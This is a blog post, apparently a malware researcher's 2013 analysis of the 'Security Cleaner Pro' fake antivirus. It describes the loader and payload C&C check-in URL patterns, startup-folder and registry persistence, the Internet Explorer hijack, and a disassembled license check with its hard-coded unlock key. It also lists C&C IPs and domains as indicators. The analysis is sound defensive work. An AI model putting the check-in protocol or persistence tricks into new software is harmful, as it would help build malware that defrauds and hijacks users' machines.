October 4, 2013
Analysis of the “Security Cleaner Pro” fake antivirus

Another one of the FakeAV’s, this time it is called “Security Cleaner Pro”. The detection is quite low, 4/48 on VT for the loader and 8/48 for the payload.

Loader 2a8038d3acd963e804ca38a912ba116b : VirusTotal
Payload 8d15016f249274158e0472a02f9de00e : VirusTotal

image

Analysis

This sample dropped from Blackhole and installed itself as usual with a shortcut on the desktop and active in the system tray.

When the loader starts it will try setting up a connection with the C&C to report a new install for the loader. After this it requests a payload. This payload will also check-in to tell it has properly installed. After that the FakeAV payload will do check-ins at a regular interval to confirm payment to the C&C. On a network level this looks like this step by step:

GET http://<domain> .tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=1
200 OK (text/html)

GET http://<domain> .tld/index/getsoft/?id=<unique_system_id>&os=<os_info>&advertid=<affiliate_id>&type=1
200 OK (application/octet-stream)

GET http://<domain> .tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=2
200 OK (text/html)

GET http://<domain>.tld/index/checklic/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]
200 OK (text/html)

As you can see the install checking with type 1 is the loader and type 2 is the actual FakeAV payload. We get an non-crypted payload back.

image

After the payload has been downloaded it is copied to:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\shl.exe

The filename is fixed and always seem to be the same. One thing to note is that other versions I had installed in %appdata% and set a startup key instead of dropping in the startup folder, like so:

[ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ], 
"ProtSoftware Inc" = "C:\Documents and Settings\All Users\Application Data\shl.exe"


The filename shl.exe seems to be fixed since earlier versions as well.

After having setup itself the application starts with the usual infected scan information:
imageimage

So yes the usual, we are infected! Now before digging into the activation lets look around at the applications. It features (fake) updating:
image

The rest of the application shows generic options which are all (obviously) fake and have no function.

image

image

image

image

image

image

You can also contact the support desk via email if you click the button at the top:

image


From time to time there is also a fake Windows Security Center popup to warn you to activate the AV, the entire dialog is an image and clicking anywhere just brings the FakeAV to the front:
image

Another trick this FakeAV does is hijack the browser, only Internet Explorer. When a new process is spawned it will check the filename, if its named ‘iexplorer.exe’ it will let it run, otherwise it will be killed. Funny enough it doesn’t seem to be able to pick up new processes fast enough so if you just start your debugger 5-10 times fast one of them will not be killed.

The injection in IE looks like this when trying to browse anywhere:
image

Lets look at the activation of this ‘product’. When you click register you will get a page looking really familiar, it seems to be a generic payment template also used by the Titan AV I wrote about some time ago.

imageWe can pay or put in a registration key ourselves

image

If we cancel we get a warning message of how we are unprotected.

image

And if we enter the wrong information we get a warning.

image


So we open up our debugger and we figure out how the check works:

00407F62  |>  50            PUSH EAX                                 ; /String2
00407F63  |.  51            PUSH ECX                                 ; |String1
00407F64  |.  FF15 BC704100 CALL DWORD PTR DS:[<&KERNEL32.lstrcmpiW> ; \KERNEL32.lstrcmpiW
00407F6A  |.  8BD8          MOV EBX,EAX
00407F6C  |.  F7DB          NEG EBX
00407F6E  |.  1ADB          SBB BL,BL
00407F70  |.  6A 01         PUSH 1                                   ; /Arg1 = 1
00407F72  |.  33FF          XOR EDI,EDI                              ; |
00407F74  |.  8D75 9C       LEA ESI,[EBP-64]                         ; |
00407F77  |.  E8 63260000   CALL 0040A5DF                            ; \security_cleaner_pro.0040A5DF
00407F7C  |.  FEC3          INC BL
00407F7E  |.  74 2B         JZ SHORT 00407FAB
00407F80  |.  6A 40         PUSH 40                                  ; /Type = MB_OK|MB_ICONASTERISK|MB_DEFBUTTON1|MB_APPLMODAL
00407F82  |.  68 64C74100   PUSH OFFSET 0041C764                     ; |Caption = “Information”
00407F87  |.  68 7CC74100   PUSH OFFSET 0041C77C                     ; |Text = “Thank you for registering!”
00407F8C  |.  FF75 98       PUSH DWORD PTR SS:[EBP-68]               ; |hOwner => [ARG.EBP-68]
00407F8F  |.  FF15 20724100 CALL DWORD PTR DS:[<&USER32.MessageBoxW> ; \USER32.MessageBoxW

A simple string compare with the real key, so to activate this FakeAV we can use the following key which is hard-coded in all the bins I’ve tried. The key:


YKGVWHVSFETPXBIMDXUJSUYGPRADAOHZ

Now we are licensed and we can ‘clean’ the infections found during the scan. We are now also allowed to start new applications.

image

image

And as we can expect after registration any new scan turns up no infections.

image

Command and Control Server(s)

So with this FakeAV there are 4 dedicated C&C servers which form the backend. The initial domain seen with the first version I got was wirejournal.biz, after a day or so I got a new hit on lenderspoker.in. All the domains have multiple A-records pointing to:

  • 188.93.210.164 - Russian Federation Moscow Ltd Hosting Service
  • 109.234.154.254 - Russian Federation Saint Petersburg Ooo Network Of Data-centers Selectel
  • 109.120.150.95 - Russian Federation Saint Petersburg Zao National Telecommunications
  • 91.240.22.98 - Ukraine Donets’k Wibo Project Llc

After some more checking I was able to find more domains used by these IP’s. Not sure what all these are for but its a somewhat big list for just a FakeAV:

  • blogscifi.info
  • corporationsbenefits.info
  • hichspeedtest.com
  • high-speed-dns.com
  • journalvillepremium.info
  • lenderspoker.in
  • lite-interserve-promo.com
  • mapaddiction.biz
  • ntbook.ru
  • podcastbots.info
  • psychologistdrive.info
  • requiresearch.info
  • testingadvisor.info
  • wirejournal.biz
  • woolis.ru

At the beginning you saw the structure of the check-ins. One of the params given with the check-in is ‘advertid’. This refers to an affiliate of the program. The idea is that you sign up, get your own affiliate ID, you spread the loader given to you which checks in with your personal ID and for every new client you infect with it you get money. As simple as that.

One thing the C&C servers do when retrieving the loaders or payloads it modifies a resource of the PE called ‘RCDATA’ to hold your personal ID. This way an infection can be lead back to the appropriate affiliate for payment. This does mean every affiliate has unique bins. I’ve been able to identify at least 49 affiliates and have retrieved 89 unique loaders and 42 payloads. To get the AV vendors to create generic detection instead of specifics for a bin hash I’ve decided to upload all of them. At the end of the article you will find a section called ‘Unique Samples’ with their VT link. If you want any of these samples to analyze/play with send me a message on twitter or email me.

Additional info

Additionally when running the FakeAV through my debugger I found the following string in memory “http://softsupport.info/open.php”. This domain is registered to a guy with the email address “dorvey_creator@rocketmail.com”. If we look this up we get a list of domains all pointing to either 95.141.28.79 or 95.141.28.81. The list of domains I was able to get looks sketchy already:

  • cleanerpro1.biz
  • cleanerpro2.biz
  • cleanerpro3.biz
  • cleanerpro4.biz
  • cleanerpro5.biz
  • cleaner-pro1.biz
  • cleaner-pro2.biz
  • cleaner-pro3.biz
  • cleaner-pro4.biz
  • cleaner-pro5.biz
  • cleaner-pro6.biz
  • cleaner-pro7.biz
  • cleaner-pro8.biz
  • cleaner-pro9.biz
  • cleaner-pro10.biz
  • cleaner17.biz

I do not know what this guy is up to but if you also check the VT entries for those IP’s: [95.141.28.79] and [95.141.28.81] you can see tons of DynDNS passing by. If I find out what his connection is to this FakeAV or what he is doing with those servers and domains I’ll write another article.

Unique Samples

Loaders (88 in total)

Payloads (42 in total)

Blog comments powered by Disqus